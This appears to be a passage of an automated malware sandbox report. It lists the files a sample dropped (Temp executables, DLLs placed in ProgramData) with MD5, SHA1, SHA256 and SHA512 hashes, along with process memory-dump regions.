SHA256 fe26f8ca5512caeff7dffd12c2ffc11115850db0764a3ef9f943fa9f349e0a77
SHA512 b9ea2629a7f212aab59cb7a8bfdb684b1f23086b488b2a28b25784ad629c42dd8e71b4ef4927728df436a53c2f94d66013a166a407bcbc5dd6570c3b03fb31ad

memory/1612-151-0x0000000002910000-0x0000000002950000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 12dada190827ebad40aa7e70e28a6f02
SHA1 172009e0cb78cb093bcccf5e69df83a7dba4605d
SHA256 182d486d4735037d6be3a083acedd0991cf9520d20faa6f4bce7470675952c42
SHA512 bd9daf51dd65553076b651224cab416dccddc7230212fa4d12423394d765dbb6f0355f3f0631c9c5359417347505085667f4682da91d89d3baeae82e67bcbc78

C:\Users\Admin\AppData\Local\Temp\i1.exe

MD5 fdd3895eb388f733e4aabd00db54e6f7
SHA1 604978bd31d87066735e13343f26f80ce7f45706
SHA256 303ba93e0bb762a95859f5c94016e7cda0ace2fba811fb78e86af98baa2f3d01
SHA512 6b891f36976ec4f5bd8590215f191c43e93f69c19a83f2eab44ef5b2d17fbecc5531a05c2137c97164f0917bf5a0d41cb245760eb1544d83fa212d4a1d806756

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\Users\Admin\AppData\Local\Temp\ugs.0.exe

MD5 f85ca7da4201921c93b98f6555f3d7b7
SHA1 523891e3e23bb45a52e402b6282f70f9e17cde9c
SHA256 eeaa177b0bc2d85cf8b416c2ed3b85fd50bd7c811bf41a32d161a10a767c2fda
SHA512 1b8220fe954799fbc43a702a1c508beff390c3f5a58e8e50e3c5ccce48459ec3a25df395f041f722cb67b0eb6c31013239f58a8b947e60344d15ce0c56e9cb17

C:\Users\Admin\AppData\Local\Temp\UGS1~1.ZIP

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

C:\Users\Admin\AppData\Local\Temp\ugs.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

memory/408-282-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ugs.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

C:\Users\Admin\AppData\Local\Temp\ugs.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/1544-303-0x0000000073D10000-0x0000000073E84000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ugs.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

memory/1544-311-0x00000000778A0000-0x0000000077A49000-memory.dmp

\Users\Admin\AppData\Local\Temp\ugs.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/604-377-0x0000000000400000-0x0000000001A3C000-memory.dmp

memory/1544-401-0x0000000073D10000-0x0000000073E84000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cd0457d7

MD5 a03f27154b557f18e8c42b73077d6dfd
SHA1 b3056140416c384dcc915467c00bb70e9e70f125
SHA256 51465b98eb2483ce4507d906a880193acb0abb69626e31af0d624cc286e403e7
SHA512 06a21bac33bc9462a846cf7a9d7dd41ad5123c8c2cc7fc3bc35f7d2ace8e275c63bcbf870ba1765c0c62e90455609829827967005af7f756b1425da7e4c2ae0a

memory/408-410-0x0000000000400000-0x000000000083A000-memory.dmp

memory/2672-413-0x00000000778A0000-0x0000000077A49000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 4e15970a2356c3311fff5a25b3612600
SHA1 72bea07e88c2a88de774d1e3692aa81a1c9ec16b
SHA256 54af852620c9b26c6644fb3732e1f62d02765d052f534444ad310f0db81d5da7
SHA512 5e8ea87584fe7c01636489d50448e7471ba19b9bd1149cf2a3bcc626a5ad195f342bacf33a87c5f3df7657fd8ee4f53cf02b7809c4afe8c566dcac3cd56a07ab

memory/1608-469-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1112-475-0x0000000000AD0000-0x00000000043C8000-memory.dmp

memory/1112-476-0x000000001ED90000-0x000000001EEA0000-memory.dmp

memory/1112-478-0x0000000000AC0000-0x0000000000ACC000-memory.dmp

memory/1112-477-0x00000000004F0000-0x0000000000500000-memory.dmp

memory/1112-479-0x0000000000560000-0x0000000000574000-memory.dmp

memory/1112-480-0x00000000059A0000-0x00000000059C4000-memory.dmp

memory/1112-484-0x000000001F7C0000-0x000000001F872000-memory.dmp

memory/1112-483-0x000000001EC30000-0x000000001EC5A000-memory.dmp

memory/1112-482-0x0000000005AD0000-0x0000000005ADA000-memory.dmp

memory/1112-485-0x000000001F870000-0x000000001F8EA000-memory.dmp

memory/1112-486-0x000000001E4B0000-0x000000001E512000-memory.dmp

memory/1112-487-0x0000000000510000-0x000000000051A000-memory.dmp

memory/1112-491-0x000000001FE40000-0x0000000020140000-memory.dmp

memory/1112-493-0x0000000000AB0000-0x0000000000ABA000-memory.dmp

memory/1112-494-0x00000000058E0000-0x0000000005902000-memory.dmp

memory/1112-497-0x0000000005900000-0x000000000590C000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/408-526-0x0000000000400000-0x000000000083A000-memory.dmp

memory/1112-527-0x0000000000530000-0x000000000053A000-memory.dmp

memory/2672-528-0x0000000073D10000-0x0000000073E84000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\bd92d7984d802ff9a1e24336bd1ccb4209c69a1bd116225cd9479ac9d0f516c4\84af76652e58465384fe5df010aef13c.tmp

MD5 03095887d4de39c186e03489d4afb9ef
SHA1 ce40c68344ea2ba092e27787178a899dc8a05763
SHA256 3f23d563d18318f2448a804bcc50694b8e48b228d9ed05d9bb3a176409bc60f0
SHA512 24b80c7c977d0cf6852a1ea1177bac2972597b884d76f866d6e200c4c2ef30bc51d587f8749134cfe13b573dfd9489a0997d93b1a3c054ef7b93444b7e717743

memory/2728-536-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2728-537-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2728-535-0x0000000072CA0000-0x0000000073D02000-memory.dmp

memory/408-540-0x0000000000400000-0x000000000083A000-memory.dmp

memory/2728-541-0x0000000000400000-0x00000000004C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpBDC4.tmp

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73